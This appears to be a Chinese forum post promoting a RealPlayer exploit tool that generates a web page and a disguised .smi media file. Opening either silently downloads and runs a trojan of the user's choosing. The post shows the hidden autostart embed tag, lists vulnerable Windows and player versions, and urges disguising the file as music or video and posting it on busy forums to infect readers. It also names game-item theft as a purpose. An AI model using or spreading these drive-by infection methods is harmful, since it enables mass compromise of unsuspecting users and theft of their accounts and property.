RealPlayer网马生成器
木马利用realplay的漏洞而制作,设计面很广,挂马方便、容易。
目标主机: win2000,winxp,win2003 装有realoneplayer,realplayer,暴风影音的机器
中马方式:隐蔽,打开页面即可立即中。隐藏执行所挂木马。
您可让用户边听歌,边中木马。呵呵
如果你在访客众多的论坛上发个留言,那么,看了的人可都全中了。!!此工具适合做网游装备和挂马的朋友!
注意:此漏洞涉及面广,利用价值高,不得用于非法用途!!
木马生成器说明:
界面说明:
木马下载地址: 请指定您希望对方用户自动下载并运行的程序。
页面显示内容: 网页内欺骗内容,可随意编写。
结果说明:
生成后,本目录下将有两文件: music.htm music.smi
[music.htm]
木马网页,核心部分是其中的:
<embed type="audio/x-pn-realaudio-plugin" src="music.smi" height=0 width=0 autostart=true>
意思是在ie中嵌入music.smi媒体,并自动播放,高度height和宽度width都为0(隐藏起来),您也可以让它显示出来,自己随意定制。
[music.smi]
木马核心文件,.smi类型可保证默认是用realplay打开,从而提高命中率,一看即中,你也可以把此文件改名,例如: 好看电影.smi,好听音乐.smi,搞笑片段.smil等等,可直接让别人打开即中。
另,如果想在论坛一些地方放此溢出木马,直接把music.smi文件当成普通的mp3,rm文件一样发出去即可。
例如你的music.smi放在 http://www.a1234.com/haha/music.smi,你就可以把此链接放到想利用的论坛或者什么地方,即看即中。
ps:本溢出程序在中文win2000 sp0-sp4,winxp sp0-sp2,win2003 sp0-sp1下试验通过.
支持realoneplayer,realplayer10,暴风影音所有能完全支持real媒体的机器。
漏洞已经通报real公司,公司应该会出了补丁。但real软件不支持自动升级,98%的用户都不会去real网站上升级,所以利用率极大!
------------------------------------------------------------------------
ps: 这是暑假的时候写的exploit,看了论坛里有人贴出来(不过那人自己加了网马后门),所以我在这里再次发布,完全干净,请朋友们尽情使用.
使用中,有问题可及时像我反馈,我收到后将给予回答。